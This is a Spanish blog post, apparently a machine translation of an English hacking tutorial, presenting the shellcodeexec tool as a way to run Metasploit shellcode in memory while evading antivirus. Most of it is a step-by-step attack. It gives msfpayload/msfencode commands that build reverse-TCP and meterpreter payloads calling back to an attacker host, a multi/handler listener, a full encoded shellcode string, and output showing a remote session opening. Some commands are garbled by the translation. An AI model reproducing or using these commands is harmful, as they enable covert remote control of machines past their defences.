Bypass

Saludos Mundo Libre.

Shellcodeexec: Ejecutar Carga Metasploit Anulación de la protección antivirus!
Imagínese esto - está llevando a cabo una prueba de penetración y te encuentras con una máquina sin parchear. La máquina está tan mal parcheado que incluso se puede ejecutar el SMBv2 (CVE-2009-3103) explotar a través de Metasploit y su ejecución desde el script de la memoria meterpreter no usted. Las banderas de antivirus que usted y su explotación corre sin éxito. msfencode no ayuda tampoco! ¿Qué hacer entonces? Utilice Shellcodeexec, una secuencia de comandos para ejecutar en la memoria una secuencia de códigos de operación. Sus características actuales son:

Pueden ser compilados y trabaja en POSIX (Linux / Unix) y Windows.
Pueden ser compilados y trabaja en 32 bits y 64 bits.
Hasta donde yo sé, ningún AV lo detectan como malicioso.
Obras en el DEP / NX habilitado ambientes: se asigna la página de memoria donde almacena el código shell como + rwx - lectura escritura y ejecutable.
Es compatible con codificación alfanumérica cargas útiles: se pueden canalizar su shellcode con codificación binaria (generados por ejemplo con msfpayload Metasploit) a msfencode Metasploit para codificar con el codificador alpha_mixed. Establezca la variable de BufferRegister al registro EAX, donde será la dirección en la memoria de la shellcode almacenados, para evitar get_pc () trozo binario a añadirse en el código shell.
Genera un nuevo subproceso donde se ejecuta el código shell en una estructura de controlador de excepciones (SEH), de modo que si usted envuelve shellcodeexec en su propio ejecutable, se evita todo el proceso se bloquee en caso de comportamientos inesperados.

Cómo utilizar shellcodeexec?
El autor presenta ejemplos perfectos para ejecutar la herramienta. Las hemos catalogado como en:

1. Generar un Metasploit shellcode y decodificar con el codificador alfanuméricos. Por ejemplo, para un objetivo de Linux:



$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

O para un objetivo de Windows:


$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Ejecute el Metasploit multi / controlador de escucha en el equipo. Por ejemplo, para un objetivo de Linux:


$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

O para un objetivo de Windows:


$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Ejecutar el código shell con codificación alfanumérica con esta herramienta. Por ejemplo, en el objetivo de Linux:

$ ./shellcodeexec

O, por el destino de Windows:

C:WINDOWSTemp>shellcodeexec.exe

Background

La mayoría de los lanzadores shellcode por ahí, incluida la prueba de una parte de los libros de conceptos de seguridad muchos detalles de cómo asignar una página de la memoria como lectura / escritura / ejecutable en sistemas POSIX, copiar el código shell y ejecutarlo. Esto funciona muy bien. Sin embargo, se limita a POSIX, no necesariamente en cuenta la arquitectura de 64 bits y Windows.

Descripción

Esta secuencia de comandos y los archivos de proyecto correspondientes (MAKE y archivos de Visual Studio) le permite compilar la herramienta una vez y luego ejecutar el código shell en diferentes arquitecturas y sistemas operativos.

Por otra parte, que resuelve un problema común del mundo real: el software del sistema de destino de lucha contra el virus de bloquear un servidor de ensayo de carga útil Metasploit generado (o EXE de ELF). Tomemos, por ejemplo, la siguiente línea de comandos:
$ ventanas msfpayload / meterpreter / reverse_tcp EXITFUNC proceso lport = = = 4,444 lhost 192.168.136.1 R | msfencode-uno-e x86 x86/shikata_ga_nai-o / tmp / payload.exe-t exe

Esto genera un servidor de ensayo de carga útil Metasploit, payload.exe, que tan pronto como cae en el sistema de destino AV-protegida es reconocida como malicioso y potencialmente bloqueados (en función del análisis en tiempo de configuración) por muchos productos antivirus. En el momento de redactar este texto, 21 de 41 anti virus lo detecta como malicioso. Mediante la codificación de múltiples veces con msfencode, menos software AV lo detecta, aún falta mucho.

He estado navegando por Internet y que se encuentran algunos interesantes tutoriales y guías sobre el embalaje, la compresión, la ofuscación y la aplicación de la AIF-fu a los ejecutables portátiles y otros similares con el fin de reducir el número de productos de AV, que puede detectar como un archivo malicioso. Todo esto es interesante, pero no para unos pocos contra los virus son difíciles de morir para detectar su puerta trasera.

Entonces la pregunta es, ¿cómo fresco sería tener una solución final para evitar todo este problema? Aquí es exactamente donde esta herramienta entra en juego!

shellcodeexec:

Pueden ser compilados y trabaja en POSIX (Linux / Unix) y Windows.
Pueden ser compilados y trabaja en 32 bits y 64 bits.
Hasta donde yo sé, ningún AV lo detectan como malicioso.
Obras en el DEP / NX habilitado ambientes: se asigna la página de memoria donde almacena el código shell como + rwx - lectura escritura y ejecutable.

Es compatible con codificación alfanumérica cargas útiles: se pueden canalizar su shellcode con codificación binaria (generados por ejemplo con msfpayload Metasploit) a msfencode Metasploit para codificar con el codificador alpha_mixed. Establezca la variable de BufferRegister al registro EAX, donde será la dirección en la memoria de la shellcode almacenados, para evitar get_pc () trozo binario a añadirse en el código shell.

Genera un nuevo subproceso donde se ejecuta el código shell en una estructura de controlador de excepciones (SEH), de modo que si usted envuelve shellcodeexec en su propio ejecutable, se evita todo el proceso se bloquee en caso de comportamientos inesperados.

Ejemplo

1. Generar un Metasploit shellcode y decodificar con el codificador alfanuméricos. Por ejemplo, para una meta de Windows:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA

2. Ejecute el Metasploit multi / controlador de escucha en el equipo. Por ejemplo, para una meta de Windows:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Ejecutar el código shell con codificación alfanumérica con esta herramienta. Por ejemplo, en la meta de Windows:

C:\WINDOWS\Temp>shellcodeexec.exe

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4L
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA

Si se dirige de nuevo a la terminal donde la multi / controlador está en ejecución, estará feliz de ver:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E
[*] Please wait while we load the module tree...

[...]

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 673 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12306 updated 7 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 4444
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011

meterpreter > sysinfo
System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32

La herramienta junto con los archivos de compilación para sistemas POSIX y Windows se pueden encontrar en mi GitHub en la dirección https: / github.com / / inquisb / shellcodeexec.

AUTHOR
Adnan Anjum

TRADUCCION
Dellcom1@

FUENTE
http://hackguide4u.blogspot.com/2011/04/bypass-antivirus-protection-and-execute.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+LearnHowToHackEthicalHacking+%28Learn+How+to+Hack+%2C+Ethical+Hacking+Tutorials+and+Cyber+Security+Tips%29

SAludos Mundo Libre.